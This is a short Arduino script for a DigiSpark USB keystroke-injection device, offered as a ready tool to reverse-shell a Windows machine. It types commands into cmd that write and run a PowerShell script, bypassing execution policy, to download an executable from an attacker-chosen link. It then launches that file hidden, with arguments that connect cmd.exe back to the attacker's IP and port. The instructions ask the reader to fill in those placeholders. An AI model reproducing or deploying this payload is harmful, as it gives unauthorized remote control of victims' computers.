A script to reverse shell a windows machine.

Replace LINK with a direct download link, IP with your listening IP, and PORT with a port of your choice.

(Runs only once)

  #include "DigiKeyboard.h"
  void setup() {
    //empty
  }
  void loop() {
    DigiKeyboard.delay(500);
    DigiKeyboard.sendKeyStroke(0);
    DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
    DigiKeyboard.delay(200);
    DigiKeyboard.print("cmd");
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.delay(500);
    DigiKeyboard.print("cd / & mkdir win & cd win & echo (wget 'LINK' -OutFile a.exe) > b.PS1 
  & powershell -ExecutionPolicy ByPass -File b.ps1");
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.delay(100);
    DigiKeyboard.print("START /MIN a.exe IP PORT -e cmd.exe -d & exit");
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    for(;;){ /*empty*/ }
  }